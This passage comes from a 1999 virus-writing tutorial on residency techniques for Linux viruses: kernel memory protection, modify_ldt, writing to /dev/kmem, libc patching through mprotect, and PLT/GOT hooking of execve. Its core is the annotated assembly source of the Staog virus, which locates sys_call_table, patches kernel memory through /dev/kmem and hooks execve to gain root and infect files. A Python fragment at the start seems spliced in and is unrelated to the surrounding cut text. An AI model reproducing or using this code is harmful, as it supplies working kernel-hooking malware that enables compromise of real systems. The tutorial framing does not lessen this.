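instruction stores 6 bytes, a 16-bit limit followed by a 32-bit linear base,
and gdb prints them as two little-endian 32-bit words. A small sketch (the
helper name `decode_table_register` is made up for this example):

```python
import struct


def decode_table_register(word0, word1):
    """Decode the 6 bytes stored by SIDT/SGDT from two words printed by x/2."""
    raw = struct.pack("<II", word0, word1)[:6]   # the instruction writes 6 bytes
    limit, base = struct.unpack("<HI", raw)      # 16-bit limit, 32-bit base
    return limit, base


if __name__ == "__main__":
    dumps = {"IDT": (0x501007FF, 0x0807C180),
             "GDT": (0x6880203F, 0x0807C010)}
    for name, words in dumps.items():
        limit, base = decode_table_register(*words)
        zone = "kernel" if base >= 0xC0000000 else "user"
        print(f"{name}: base={base:#010x} limit={limit:#06x} ({zone} zone)")
```

The upper 16 bits of the second word (0x0807 in both dumps) are simply
whatever was in memory after the 6 bytes and are ignored.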
We can build a module for read the CR3 reg, that contains the physical address of the page table, and with that info, visualize the mapped pages. The program would be the following one: /**************************************************************************** Lector de la Tabla de Paginas ***************************************************************************/ /* Format of an entry 31-12 11-9 7 6 5 2 1 0 address OS 4M D A U/S R/W P If p=1 the page is in memory If R/W=0 means that it's readonly If U/S=1 means that the page is an user page If A=1 means that the page have been accessed If D=1 page dirty If 4M=1 it's a 4M page (only for the tdd entry) OS is specific of the operative system */ #include #include #include #include #include #include #include #include #include #include #ifdef MODULE extern void *sys_call_table[]; unsigned long *tpaginas; unsigned long r_cr0; unsigned long r_cr4; /* read some interesting registers */ int init_module(void) { unsigned long *temp; int x,y,z; /* Read the physical address of the page table that is matches with the virtual address */ /* And btw, i read some interesting processor regs like cr0 and cr4 */ /* As we can see, in CR4 is activated the option of 4M pages */ /* And in CR0 the WP bit active :) */ __asm(" movl %cr3,%eax movl %eax,(tpaginas) movl %cr0,%eax movl %eax,(r_cr0) movl %cr4,%eax movl %eax,(r_cr4) "); x=tpaginas+0xc0000000; printk(" The physical and virtual address \n"); printk(" of the page table is : %x\n",tpaginas); printk(" Control Register Cr0: %x\n",r_cr0); printk(" Control Register Cr4: %x\n",r_cr4); for (z=0;z<90000000;z++){} for(x=0x0;x<0x3ff;x++) { if (((unsigned long) *tpaginas & 0x01) == 1) { printk("Entry %x -> %x ",x,(unsigned long) *tpaginas & 0xfffff000); printk(" u/s:%d r/w:%d\n",(((unsigned long) *tpaginas & 0x04)>>2),(((unsigned long) *tpaginas & 0x02)>>1)); printk(" OS:%x ",((unsigned long) *tpaginas &0xffff ) >>9 ); printk(" p:%d\n",((unsigned long) *tpaginas & 0x01)); if ((((unsigned 
long) *tpaginas & 0x80)>>7)==1) { printk("In the virtual address -> %x",x<<22); printk(" there is a 4M page \n"); for (z=0;z<90000000;z++){}; tpaginas++; continue; }; for (z=0;z<4000000;z++){}; temp=((unsigned long) *tpaginas & 0xfffff000); /* in temp i read the page table address */ if (temp!=0 && ((unsigned long) *tpaginas & 0x1)) { for (y=0;y<0x3ff;y++) { if (((unsigned long) *temp & 0x01) == 1) { printk("Virtual %x -> %x ",(x<<22|y<<12),((unsigned long) *temp & 0xfffff000)); printk(" u/s:%d r/w:%d",(((unsigned long) *temp & 0x04)>>2),(((unsigned long) *temp & 0x02)>>1)); printk(" OS:%x ",((unsigned long) *temp &0xffff ) >>9 ); printk(" p:%d\n",((unsigned long) *temp & 0x01)); }; if (*temp!=0) {for (z=0;z<4000000;z++){}}; /* slow-down */ temp++; }; }; }; tpaginas++; }; } void cleanup_module(void) { } #endif /***************************************************************************/ After the execution of this program we can get the mapped pages in that mo- ment, and the protection attributes of each page. The first page we would see would be the read-only pages of the process being executed in Ring-3 on the address 8040000 with read only attributes and the user bit, the next ones would be the read/write pages of the execu- table, with user attributes too. After, in the 40000000 address we would have the library libc mapped in memory in a similar way: first r/w code, and after, some read only pages. When we arrive to the linear address 0xC0000000 we enter the marvelous world of the core, where is mapped all the physical memory of your PC. If it's Pentium or higher, it will use 4M pages. So, if you have 16 megs of RAM, from the 0xC0000000 address, Linux would use 4 entries in the directory table for map those 16 megs, if it would have 32 it would use 8, etc. This system guides us to make ourselves some questions, like, for example, what would happen if we got 1G of physical memory? 
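The entry format listed in the header comment of the module can also be decoded in plain user-space C, which is handy for checking by hand the values the module prints. This is only a sketch of the bit arithmetic: pte_info, decode_pte, directory_index and entries_for_4m_pages are names invented for this example, and nothing here touches the real page table.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Fields of a 32-bit x86 page directory / page table entry. */
struct pte_info {
    uint32_t frame;     /* bits 31-12: physical address of the page */
    unsigned os_bits;   /* bits 11-9 : free for the operating system */
    int large_4m;       /* bit 7     : 4M page (directory entries only) */
    int dirty;          /* bit 6 */
    int accessed;       /* bit 5 */
    int user;           /* bit 2     : 1 = user page, 0 = system page */
    int writable;       /* bit 1     : 1 = read/write, 0 = read-only */
    int present;        /* bit 0 */
};

/* Hypothetical helper: split one raw entry into its fields. */
static void decode_pte(uint32_t entry, struct pte_info *out)
{
    assert(out != NULL);
    out->frame    = entry & 0xFFFFF000u;
    out->os_bits  = (entry >> 9) & 0x7u;
    out->large_4m = (int)((entry >> 7) & 1u);
    out->dirty    = (int)((entry >> 6) & 1u);
    out->accessed = (int)((entry >> 5) & 1u);
    out->user     = (int)((entry >> 2) & 1u);
    out->writable = (int)((entry >> 1) & 1u);
    out->present  = (int)(entry & 1u);
}

/* Page directory index of a linear address (top 10 bits). */
static unsigned directory_index(uint32_t linear)
{
    return (unsigned)(linear >> 22);
}

/* Directory entries needed to map ram_mb megabytes with 4M pages. */
static unsigned entries_for_4m_pages(unsigned ram_mb)
{
    return (ram_mb + 3u) / 4u;
}
```

With these helpers, 16 megs need 4 directory entries and 32 megs need 8, as said above. The kernel zone starts at directory entry 768 (0xC0000000 >> 22), which leaves 256 entries of 4M each, that is, exactly 1G of linear space up to 0xFFFFFFFF.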
In these kernel pages lies the code of the kernel, as well as the page table,
and surprisingly they lack protection via pagination: they are marked with
r/w attributes and the user bit, so badly coded modules that try to overwrite
kernel code would achieve that goal without raising any protection fault :)

But that's not all. After mapping all the physical memory of the machine,
Linux maps some 4Kb pages, all with system attributes. Only one of them, the
page used to store the IDT (interrupt table), has read-only attributes and
the S bit, so any badly coded module that tried to overwrite it would fail
and die with a protection fault, and the system would remain stable.

Whether Ring-0 code can modify a read-only page is controlled by the WP bit
of the control register CR0. If that bit is set to 1, Ring-0 code cannot
write to read-only pages, be they user or kernel pages. If that bit is set to
0, memory protection works as on a 386 and Ring-0 code can do whatever it
wants, modifying any mapped page regardless of its protection attributes.
So, if a Linux module wants to modify the IDT, it first has to clear the WP
bit of CR0 to be able to write, or change the attributes of that page in the
page table.

Because of all this, the real protection mechanism in Linux is segmentation,
and not pagination as in Windows NT. If we had 4G segments, as in NT, and
pagination stayed as it is, we would have free access to kernel memory, but
this is not the case.

NOTE: Current kernel versions such as 2.2.XX use a protection similar to NT,
      with 4G segments. Sadly I haven't been able to look at the page table
      of that version, but it would be foolish to assume it stays the same.

Another possible way to achieve Ring-0 in Linux is to use the system call
modify_ldt to generate a CALL GATE.
That system call was created so that WINE could emulate the Windows memory
system, where the user segment descriptors lie in the LDT and not in the GDT,
and where it's possible to address all the memory with those segments.

Generating a CALL GATE with modify_ldt would be possible if we could write
every field of each generated entry, but that's not possible. Firstly,
modify_ldt doesn't accept an INTEL segment descriptor as input. It uses this
pseudo structure, which is later translated inside the call to a descriptor
in INTEL format:

    struct modify_ldt_ldt_s {
        unsigned int entry_number;       /* The entry we want to modify */
        unsigned long base_addr;         /* The base address of the segment */
        unsigned int limit;              /* The limit of the segment */
        unsigned int seg_32bit:1;        /* 16-bit or 32-bit segment */
        unsigned int contents:2;         /* Data, code or stack */
        unsigned int read_exec_only:1;   /* Protection attributes */
        unsigned int limit_in_pages:1;
        unsigned int seg_not_present:1;  /* Whether it's in memory or not */
        unsigned int useable:1;
    };

If we look at the code of the call in /usr/src/linux/arch/i386/kernel/ldt.c,
it shows us how that structure is transformed into an INTEL descriptor:

    *lp = ((ldt_info.base_addr & 0x0000ffff) << 16) |
          (ldt_info.limit & 0x0ffff);
    *(lp+1) = (ldt_info.base_addr & 0xff000000) |
              ((ldt_info.base_addr & 0x00ff0000)>>16) |
              (ldt_info.limit & 0xf0000) |
              (ldt_info.contents << 10) |
              ((ldt_info.read_exec_only ^ 1) << 9) |
              (ldt_info.seg_32bit << 22) |
              (ldt_info.limit_in_pages << 23) |
              ((ldt_info.seg_not_present ^1) << 15) |
              0x7000;

ldt_info is the structure we passed as a parameter, and *lp is a pointer into
the LDT, to the segment entry we want to modify.
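The same translation can be replayed in user space to see which descriptor bits the caller really controls. The following is just a sketch that copies the expression quoted above into an ordinary C function. ldt_request, pack_descriptor, descriptor_s_bit and descriptor_dpl are names invented for this example, and plain 32-bit fields are used instead of the kernel's bit-fields.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* User-space stand-in for the request structure (hypothetical layout). */
struct ldt_request {
    uint32_t base_addr;
    uint32_t limit;
    uint32_t seg_32bit;        /* 1 bit  */
    uint32_t contents;         /* 2 bits */
    uint32_t read_exec_only;   /* 1 bit  */
    uint32_t limit_in_pages;   /* 1 bit  */
    uint32_t seg_not_present;  /* 1 bit  */
};

/* Build the two 32-bit halves of the descriptor, as in the quoted code. */
static void pack_descriptor(const struct ldt_request *req,
                            uint32_t *low, uint32_t *high)
{
    assert(req != NULL && low != NULL && high != NULL);
    *low = ((req->base_addr & 0x0000ffffu) << 16) |
           (req->limit & 0x0ffffu);
    *high = (req->base_addr & 0xff000000u) |
            ((req->base_addr & 0x00ff0000u) >> 16) |
            (req->limit & 0xf0000u) |
            ((req->contents & 3u) << 10) |
            (((req->read_exec_only & 1u) ^ 1u) << 9) |
            ((req->seg_32bit & 1u) << 22) |
            ((req->limit_in_pages & 1u) << 23) |
            (((req->seg_not_present & 1u) ^ 1u) << 15) |
            0x7000u;   /* constant the caller cannot influence */
}

/* Bit 12 of the high half is bit 44 of the descriptor: the S bit. */
static unsigned descriptor_s_bit(uint32_t high)
{
    return (high >> 12) & 1u;
}

/* Bits 13-14 of the high half are bits 45-46 of the descriptor: the DPL. */
static unsigned descriptor_dpl(uint32_t high)
{
    return (high >> 13) & 3u;
}
```

Whatever values go into the request, descriptor_s_bit returns 1 and descriptor_dpl returns 3, because no field of the structure reaches bits 12 to 14 of the high half.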
Looking at the structure of an INTEL entry we can follow the transformation:

    63-56  55  54  53  52  51-48  47  46-45  44  43-40  39-16  15-0
    base   G   D   R   U   limit  P   DPL    S   type   base   limit
    31-24                  19-16                        23-0   15-0

With *lp we fill the first 32 bits of the entry, which hold the low 16 bits
of the limit and the low 16 bits of the base address, and with *(lp+1) we
fill in the rest of the information. But after all the operations on
ldt_info, there is an OR with the constant 0x7000. Converting this constant
to binary we get 0111000000000000, so we know that the generated descriptors
will always have bits 44, 45 and 46 set. Those bits correspond to the S bit
and the DPL. So we can only create user segments (DPL 3). That doesn't
matter, because the segment must be a user segment anyway for a user to be
allowed to execute it. The remaining bit, the S bit, is the important one.
The S bit is 1 for a normal segment and 0 for a system segment such as a TSS
or a CALL GATE, so generating CALL GATES with the modify_ldt function is
impossible.

Modify_ldt also prevents the creation of segments that reach beyond
0xC0000000, which would allow us to address the kernel's space. Modify_ldt
checks the limit of the segment we want to create with the limits_OK
function, which returns a boolean value, as can be seen in the instruction
below. 'last' is the last byte accessible through the segment, 'first' is the
first one, and the constant TASK_SIZE has the value 0xC0000000.

    return (last >= first && last < TASK_SIZE);

If we can't write to the IDT, the GDT, the LDT or the page table to jump to
Ring-0, and the call modify_ldt cannot be used to generate CALL GATES,
another possibility is to use virtual files to access kernel memory. This has
a very important problem: files such as /dev/mem and /dev/kmem can, by
default, only be accessed by root. However, it's one of the most interesting
options for creating global residents under Linux.
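Coming back for a moment to the limit check on modify_ldt described above, the effect of that return statement can be sketched in user space. This is a simplified version that only covers ordinary expand-up segments and assumes 4Kb pages. segment_within_user_space, USER_SPACE_END and PAGE_BYTES are names invented for this example, with USER_SPACE_END set to the TASK_SIZE value given in the text.

```c
#include <assert.h>
#include <stdint.h>

#define USER_SPACE_END 0xC0000000u  /* value the text gives for TASK_SIZE */
#define PAGE_BYTES     4096u        /* assumption: 4Kb pages */

/*
 * Returns 1 when every byte reachable through the segment lies below
 * USER_SPACE_END, 0 otherwise. Expand-up segments only (an assumption
 * of this sketch).
 */
static int segment_within_user_space(uint32_t base, uint32_t limit,
                                     int limit_in_pages)
{
    uint32_t span = limit & 0xFFFFFu;  /* the limit field is 20 bits wide */
    uint32_t first;
    uint32_t last;

    assert(limit_in_pages == 0 || limit_in_pages == 1);
    if (limit_in_pages)
        span = span * PAGE_BYTES + (PAGE_BYTES - 1u);

    first = base;
    last = base + span;  /* wraps modulo 2^32 on overflow */

    /* "last >= first" rejects wrapped segments, the rest rejects kernel space. */
    return last >= first && last < USER_SPACE_END;
}
```

A segment with base 0 and a limit of 0xBFFFF pages ends at 0xBFFFFFFF and passes, while the classic flat 4G segment (base 0, limit 0xFFFFF pages) ends at 0xFFFFFFFF and is rejected. A segment whose end wraps around past 0xFFFFFFFF is rejected as well, because its last byte comes out lower than its first.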
Staog is one of the few viruses for Linux that uses this method, also it doesn't wait the root to execute it, as it uses 3 different exploits for access /dev/kmem, but the exploit usages limits it's functionality to few kernel versions. The /dev/kmem allows the access of kernel memory, the first byte of that segment is the same of the first byte of kernel's segment or, what it's the same, the linear address 0xC0000000. .text # This is the code that hooks the # sys_call to execve .string "Staog by Quantum / VLAD" .global main main: movl %esp,%ebp movl $11,%eax # Firstly, checks if it's already movl $0x666,%ebx # resident, calling to execve with int $0x80 # the value 0x666 in EBX, and if it cmp $0x667,%ebx # is in mem, the virii in mem will jnz goresident1 # return the value 0x667 jmp tmpend goresident1: movl $125,%eax movl $0x8000000,%ebx movl $0x4000,%ecx movl $7,%edx int $0x80 This code is very important, because we call to mprotect for unprotect the memory pages used by the virus. This is done for avoid the modification of the ELF file, and put the data of the virus in a data section and the code in one of code. In this way, we can put all the data of the virus in the same page, and it doesn't matter if the virus is in a code section, at the execution time, it unprotects it. NOTE: It is only possible to execute mprotect inside the PerProcess memory. The first it's going to try is to reserve some kernel memory for copy the virus code there, and after will modify the sys_call_table entry that corresponds to the execve for put instead it a pointer to the hooker routine of such function. For reserve memory inside the kernel, it's only possible with kernel internal calls like kmalloc. For be able to execute it, the virus overwrites the system call uname using /dev/kmem, and makes a call to uname with the int 0x80 when it before returning from the interrupt, and it would have already executed the code we used to reserve memory with kmalloc. 
But before all that, it needs to know uname address. For that, the virus uses the system call get_kernel_syms, with it, it can obtain a list with all the internal Linux functions, and also pointers to structures as the said sys_call_table, that is an array in memory with pointers to the accesible functions with int 0x80, like uname function. movl $130,%eax # Obtain the number of symbols movl $0,%ebx # passing in EBX the value 0 int $0x80 # Returns in EAX:Number of symbols shll $6,%eax # Make a 6 bit shifting to the left. This is # the same as multiply the symbol number by 64 # that are the bytes occupied by each entry # returned by get_kernel_syms # The information obtained is the same that the # located at /proc/ksyms. # 4 bytes with a kernel address and 60 bytes # with symbol's name subl %eax,%esp # Reserve space in the stack movl %esp,%esi # before the call # the ESI register will point to a mem structure pushl %eax movl %esi,%ebx # obtain kernel symbols movl $130,%eax int $0x80 pushl %esi nextsym1: # Here i scan the symbol table in memory movl $thissym1,%edi # seaching the string current (zero-terminated) push %esi addl $4,%esi cmpb $95,(%esi) jnz notuscore incl %esi notuscore: cmpsl cmpsl pop %esi jz foundsym1 addl $64,%esi # Look how it increments 64 by 64 for make the jmp nextsym1 # comparisons foundsym1: movl (%esi),%esi movl %esi,current # Store search result in the variable popl %esi # current pushl %esi nextsym2: # Look also the kmalloc symbol with the movl $thissym2,%edi # same way. 
push %esi addl $4,%esi cmpsl cmpsl pop %esi jz foundsym2 addl $64,%esi jmp nextsym2 foundsym2: movl (%esi),%esi movl %esi,kmalloc # Store search result in the kmalloc var popl %esi xorl %ecx,%ecx nextsym: # find symbol movl $thissym,%edi # And now sys_call_table address movb $15,%cl push %esi addl $4,%esi rep cmpsb pop %esi jz foundsym addl $64,%esi jmp nextsym foundsym: movl (%esi),%esi pop %eax addl %eax,%esp movl %esi,syscalltable # Store in the syscalltable variable the xorl %edi,%edi # address found. At this point the virus knows the memory position of the sys_call_table opendevkmem: movl $devkmem,%ebx # Open the /dev/kmem file movl $2,%ecx # EBX = Ptr to string with the name call openfile # ECX = Open way ($2 read/write) orl %eax,%eax js haxorroot # If it couldn't be opened, jumps to a movl %eax,%ebx # routine for access /dev/kmem by means # of exploits # Realize that ESI still have the address of the sys_call_table, and if to # that we add 44, we will obtain a pointer to the address where is the ptr # to execve inside the sys_call_table leal 44(%esi),%ecx # lseek to sys_call_table[SYS_execve] call seekfilestart movl $orgexecve,%ecx # Read pointer's value movl $4,%edx # 4 bytes call readfile leal 488(%esi),%ecx # Now move the coresponding entry to call seekfilestart # uname inside the sys_call_table movl $taskptr,%ecx # And read the sys_call_table[SYS_uname] movl $4,%edx # value, and store it in the var taskptr call readfile movl taskptr,%ecx # Move ourselves to the code where is the call seekfilestart # uname function in memory. 
subl $endhookspace-hookspace,%esp # Reserve space in the stack for the code # that i'm going to overwrite movl %esp,%ecx # Read the code i'm going to overwrite movl $endhookspace-hookspace,%edx # of uname on the stack call readfile movl taskptr,%ecx # Return to the beginning of uname routine call seekfilestart movl filesize,%eax addl $virend-vircode,%eax movl %eax,virendvircodefilesize # Now write the routine for reserve memory over uname's code movl $hookspace,%ecx movl $endhookspace-hookspace,%edx call writefile movl $122,%eax # Make a call to uname, but what's really int $0x80 # going to be executed will be our routine movl %eax,codeto # EAX = address we've reserved movl taskptr,%ecx # Go back to uname's code call seekfilestart movl %esp,%ecx # And restore the uname's original movl $endhookspace-hookspace,%edx # that we had temporally in stack call writefile # to its original place. addl $endhookspace-hookspace,%esp # Remove the memory we had reserved # in the stack subl $aftreturn-vircode,orgexecve movl codeto,%ecx # Move now the pointer to the begin subl %ecx,orgexecve # of the mem zone we had reserved call seekfilestart movl $vircode,%ecx # And write the virus code in it movl $virend-vircode,%edx call writefile leal 44(%esi),%ecx # Search the sys_call_table, relative call seekfilestart # to execve, and i modify the orig. 
# pointer by our function addl $newexecve-vircode,codeto movl $codeto,%ecx # Write the new ptr in sys_call_table movl $4,%edx call writefile call closefile # close /dev/kmem tmpend: call exit openfile: # System calls made with int 0x80 movl $5,%eax # EAX = Function to do int $0x80 # see /usr/include/sys/syscall.h for a function ret # list closefile: movl $6,%eax int $0x80 ret readfile: movl $3,%eax int $0x80 ret writefile: movl $4,%eax int $0x80 ret seekfilestart: movl $19,%eax xorl %edx,%edx int $0x80 ret rmfile: movl $10,%eax int $0x80 ret exit: xorl %eax,%eax incl %eax int $0x80 thissym: # Here are defined some variables .string "sys_call_table" # See that they're in the same section of # the code. That's why we use mprotect. thissym1: .string "current" thissym2: .string "kmalloc" devkmem: .string "/dev/kmem" e_entry: .long 0x666 infect: # Infection routine # Here should go the ELF infection routine. It consist in generate a # temporal file with the virus code and execute it with execve ret .global newexecve newexecve: pushl %ebp movl %esp,%ebp # In the stack will be all regs, pushl %ebx # see that we're inside an int 0x80 movl 8(%ebp),%ebx pushal cmpl $0x666,%ebx # If EBX = 0x666, we return jnz notserv # 0x667 because it's the residency popal # mark. incl 8(%ebp) popl %ebx popl %ebp ret notserv: call ring0recalc # Calculate the displacement of ring0recalc: # addresses in memory popl %edi subl $ring0recalc,%edi movl syscalltable(%edi),%ebp # EBP = Address of sys_call_table call saveuids call makeroot call infect # Infect the file call loaduids hookoff: popal popl %ebx popl %ebp .byte 0xe9 # Go to the original execve func. orgexecve: # 0xE9 is the jump opocode and the .long 0 # next 4 bytes are the 4 bytes aftreturn: # if the orgexecve variable. The # equivalent would be jmp orgexecve syscalltable: .long 0 current: .long 0 .global hookspace # This is the routine that reserves memory. 
hookspace: # Its the one that is overwritten by the virus push %ebp # over uname. pushl %ebx pushl %ecx pushl %edx movl %esp,%ebp pushl $3 .byte 0x68 virendvircodefilesize: .long 0 .byte 0xb8 # movl $xxx,%eax ;0xb8 is the opcode of a movl and kmalloc: # the next bytes correpond with the kmalloc var, .long 0 # so, when we find kmalloc in mem, a call %eax # movl $kmalloc,%eax will be generated # and with call %eax we jump to kmalloc for reserve # memory movl %ebp,%esp popl %edx popl %ecx popl %ebx popl %ebp ret .global endhookspace endhookspace: .global virend virend: 2. Global residency in Ring-3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The base of this method of residency consists in the hook of routines in Ring-3 and that are executed by all the processes. The code of Ring-3 that can be executed by all the processes are the libra- ries, in windows are the DLLs. Windows, for example, distributes its space in 4 arenas, each arena has a different utility and has differend code and data. There is one arena dedi- cated to DOS that goes from the virtual address 0 to 40000000, another one dedicated to the PerProcess memory, that goes from 40000000 to 80000000, another that handles the shared memory by all the processes that goes from 80000000 to C0000000, and another dedicated to VXD, i.e. kernel's code, that is executed in Ring-0 and goes from C0000000 to FFFFFFFF. The most important library in windows is the KERNEL32.DLL, and there are the functions of file creation, memory handling, etc. (in linux the equivalent could be the library libc). The files, instead of execute directly TRAP GATES for make the calls to Ring-0 code, use a dynamic link mechanism for jump to library's code (Ring-3 code) that do the jump to Ring-0 for obtain the desired kernel service. Windows 95 commited a great dessign fail, and it is the fact that it loads the majority of libraries in the shared memory arena (KERNEL32 library is load at BFF70000 address). 
To locate the most important libraries into a shared memory arena has the advantage that the system doesn't have to load the library with each file that imports calls to that library, because it's in the process memory. This fact also makes possible the hook of system calls without the need of jump to Ring-0. Viruses like Win95.HPS and Win95.K32 use this fact for achieve global residence without jumping to Ring-0. However this is not as easy as it gets, because even if the kernel doesn't have protection by pagination, the files have protection by pagina- tion in the code sections (for handle the try of write into the code secti- ons). However, this could be unprotected easily using VXD calls like _pagemodifypermissions or library calls like memoryprotect. In Linux we could try to hook functions like execve of the libc library, located from the virtual address 0x40000000. Any try of a program of write to protected pages will mean protection faults, because there is pagination prtoection in the code sections, as in the code sections of the normal exe- cutables. But the function mprotect also works with library's code, because these are located below 0xC0000000, in the PerProcess memory. Code as the one that follows allows you to unprotect pages of libraries like libc. As we saw in the introduction, the address of the getpid function of libc its loaded in the address 0x40073000 in my Linux version, so we know that it's a code section, so it would be protected againist write attempts. [section .text] [extern puts] [global main] main: pushad mov eax,0125h mov ebx,40073000h mov ecx,02000h mov edx,07h int 80h ; Call to mprotect mov ebp,40073000h xor eax,eax ; Put EAX to 0 mov dword [ebp],eax ; Write EAX value in EBP address popad ; 0x40073000 ret Note that this program without using mprotect would generate a general protection fault. Now try to execute simultaneously 2 copies of the program. 
The first copy unprotects a libc page and sets the first bytes of getpid to
0; the second copy is stopped by gdb at main, so that we can check which
value is at the 0x40073000 address. The value won't be 0, it will be the
original value. This is because Linux doesn't load its libraries into shared
arenas, it loads them into the PerProcess memory.

But if the PerProcess memory is different for each process, do the libraries
get loaded again with each executable, occupying unnecessary memory? The
answer is NO. The solution is the copy-on-write mechanism, which lets
different processes share memory pages, even read/write ones, for as long as
nobody writes to them. When the program is loaded in memory, the page at the
0x40073000 address is the memory page of the parent program. If we try to
write to it, the system checks whether it's a read/write or a read-only page.
If it's read-only, the system generates a page fault; if it's read/write, the
OS makes a copy of that page for the child process, so when the program
writes to it, it's really writing to its own page, not to the parent's page.
This method allows libraries to be shared in memory while preserving
security and preventing undesired attempts at global residency. Linux does
implement shared memory, but only for interprocess communication mechanisms
(IPC).

3. PerProcess residency
~~~~~~~~~~~~~~~~~~~~~~~

As I explained in the chapter on ELF infection, ELF is a very powerful
format, and one of its most important features is the dynamic linking of
functions.

Linux executables don't usually use int 0x80 themselves, they leave that job
to libraries like libc. By using libraries we save disk space, because that
code is not inserted into every executable. But these libraries can be loaded
at any address of the PerProcess memory.
This makes it necessary to have a mechanism that allows calls to functions
located in other files or libraries. This mechanism is dynamic linking.

There are 2 main sections involved in the dynamic linking of functions: the
section .plt (Procedure Linkage Table) and the section .got (Global Offset
Table). Linux's dynamic linking system has advantages over other systems. The
PE format of Windows, for example, has specific sections for linkage such as
the Import Table, which has as many entries as functions imported from
libraries, and those references are resolved at load-time. Linux, however,
doesn't resolve them at load-time; it waits for the first call to each
library function to resolve the reference to that function. On that first
call the program gives control to the dynamic linker, which is mapped into
the process along with the libraries. The linker resolves the reference and
puts the absolute address of the function in a table in memory called .got,
so the following calls jump directly to the function without going through
the dynamic linker again. This improves system performance, because it avoids
resolving references that the executable may never use.

If we disassemble the next executable...

    #include <unistd.h>

    void main()
    {
        getpid();    /* 1st call to getpid */
        getpid();    /* 2nd call to getpid */
    }

We obtain the following assembler code
0x8048480
: pushl %ebp 0x8048481 : movl %esp,%ebp 0x8048483 : call 0x8048378 0x8048488 : call 0x8048378 0x804848d : movl %ebp,%esp 0x804848f : pop %ebp 0x8048490 : ret The calls to GETPID will be built as a jump to an entry in then .plt secti- on, as we can see with the command "info file", the section .plt is mapped between 0x08048368 and 0x080483C8. If we continue tracing inside the .plt code we will see the following code: 0x8048378 : jmp *0x80494e8 0x804837e : push $0x0 0x8048383 : jmp 0x8048368 <_init+8> This will be the basic structure of a .plt entry. The first jmp will be a jump to the address contained in the address 0x80494E8. This address is part of the .got table, and in the load-time will have the value 0x804837E. (gdb)x 0x80494e8 0x80494e8 <__DTOR_END__+16>: 0x0804837e As it's the first time we call to GETPID in the executavle, this will have to make a jump to the dynamic linker for obtain the address of the function in the library. For that it makes a push 0x0, where 0x0 is the pointer inside the reloc area that specifies to the dynamic linker what's the .got entry it has to modify. After, it makes a jmp 0x8048368, where 0x8048368 is the address of the first entry of the .plt section. The first entry of the .plt is special, because it's only used for call to the dynamic linker. If we contine debugging, we'll see the structure of the first .plt entry. 0x8048368 <_init+8>: pushl 0x80494e0 0x804836e <_init+14>: jmp *0x80494e4 Firstly, it puts on stack the value 0x80494E0, that corresponds with the 2nd entry in the .got table, and after it makes a jump to the address contained in 0x80494E4 (the third entry of the .got). The 3 first entries of the .got doesn't contain pointers to the .plt at load-time, they are special entries. The first one contains a pointer to the .dynamic section, and the third one is filled with a pointer to the position of the dynamic linker. 
(gdb)x 0x80494e4 0x80494e4<__DTOR_END__+12>: 0x40004180 So if we continue tracing, we'll see the code of the dynamic linker, already in the memory space of the library. When the program returns from the system call, in the .got section corresponding to GETPID, the linker will have put the absolute address of the function. If we continue tracing, in the second call to GETPID, we could see the new value in the .got section. (gdb)x 0x80494e8 0x80494e8 <__DTOR_END__+16>: 0x40073000 so,with the instruction jmp *0x80494E0 we will jump directly to the function without calling to the dynamic linker. This mechanism allows the hook of system calls inside the memory of the own process, it's the denominated PerProcess residency. A virus with this mecha- nism can hook, for example, the execve call, modifying the .plt entry that corresponds with that call, exchanging the jmp *address_in_got by a jmp *virus_address. However, the virus, being executed in Ring-3, will have the eternal limitations in the file access, and will be only able to infect the files the user can have access to. Another limitation is that it only hooks system call in contaminated files. Clean files being executed won't have their calls hooked by the virus. However, the possibilities of this method are really impressive, if a command interpret like bask or sh is infected, then, because they are commands executed by all users, the hook of execve in a PerProcess way could be as effective as a global residency. (c) 1999 Mr Anonymous [ Original Article ] (c) 1999 Billy Belcebu/iKX [ Translation ]